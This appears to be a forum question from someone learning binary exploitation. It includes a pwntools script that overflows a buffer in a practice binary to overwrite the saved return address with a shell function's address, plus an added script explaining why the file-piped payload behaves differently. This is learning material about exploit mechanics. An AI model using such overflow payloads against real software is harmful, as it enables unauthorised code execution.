Why does this payload only work within pwntools?

Çağlar Arlı      -    6 Views

I'm trying to learn binary exploitation. I started with the following:

https://github.com/tripoloski1337/learn-to-pwn/tree/master/overwrite_instruction_pointer

After a bit of experimentation, I arrived at the following pwntools script:

from pwn import *
context(arch='i386', os='linux')      # 32-bit little-endian target, so p32() packs 4 bytes LE
shell_address = 0x8049229             # address written over the saved return address
padding = b'A' * 138                  # bytes needed to reach the saved EIP
payload = padding + p32(shell_address)
# with open('payload.bin', 'wb') as f: f.write(payload)   # raw bytes only, no trailing newline
program = process(['./ip'])
program.sendline(payload)             # sends payload followed by b'\n'
program.interactive()                 # keeps stdin open and hands it to the user

This works, but if I use payload.bin by doing ./ip < payload.bin, it crashes with a segfault at 0x0 instead. The same behavior happens if I comment out the "context" line. What am I doing wrong?
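One way to see exactly what bytes each delivery path hands to the target is to rebuild the payload without pwntools and compare the two. The script below is an added example, not part of the question or of the linked repository; it reuses the question's `0x8049229` and `138` values and relies only on two documented facts: pwntools' `p32()` on an i386 context is a little-endian unsigned 32-bit pack, and `tube.sendline()` appends a newline that a plain `f.write(payload)` does not.

```python
import struct

# Values taken from the question's script.
SHELL_ADDRESS = 0x8049229
PADDING_LEN = 138


def build_payload(padding_len=PADDING_LEN, address=SHELL_ADDRESS):
    """Rebuild the question's payload with the standard library:
    pwntools' p32() under context(arch='i386') is struct.pack('<I')."""
    return b"A" * padding_len + struct.pack("<I", address)


def as_sent_by_sendline(payload):
    """What the process receives on stdin in the pwntools run:
    tube.sendline() appends a newline to whatever it is given."""
    return payload + b"\n"


def as_written_to_file(payload):
    """What `./ip < payload.bin` receives: the commented-out
    open(...).write() stores the raw bytes and nothing else."""
    return payload


def describe(data, padding_len=PADDING_LEN):
    """Split delivered bytes into padding, the 4 bytes that land on the
    saved return address, and anything that follows them."""
    ret = data[padding_len:padding_len + 4]
    return {
        "total_len": len(data),
        "padding_ok": data[:padding_len] == b"A" * padding_len,
        "return_address": hex(struct.unpack("<I", ret)[0]) if len(ret) == 4 else None,
        "trailing": data[padding_len + 4:],
    }


def diff_deliveries(payload):
    """Report where the two delivery paths first diverge and which bytes
    exist in only one of them."""
    sent = as_sent_by_sendline(payload)
    filed = as_written_to_file(payload)
    common = min(len(sent), len(filed))
    first_diff = next((i for i in range(common) if sent[i] != filed[i]), common)
    return {
        "first_difference_at": first_diff,
        "only_in_sendline": sent[common:],
        "only_in_file": filed[common:],
    }


if __name__ == "__main__":
    p = build_payload()
    print("pwntools path :", describe(as_sent_by_sendline(p)))
    print("file path     :", describe(as_written_to_file(p)))
    print("difference    :", diff_deliveries(p))
```

Running it shows that both paths place the same little-endian address (`29 92 04 08`) at offset 138; the only byte-level difference is the trailing newline that `sendline()` adds. A second difference is not visible in the bytes at all: with `./ip < payload.bin` the process's stdin hits end-of-file as soon as the file is consumed, whereas `program.interactive()` keeps stdin open, so anything the target subsequently reads from stdin behaves differently between the two runs. Both are worth checking before assuming the address or padding is wrong.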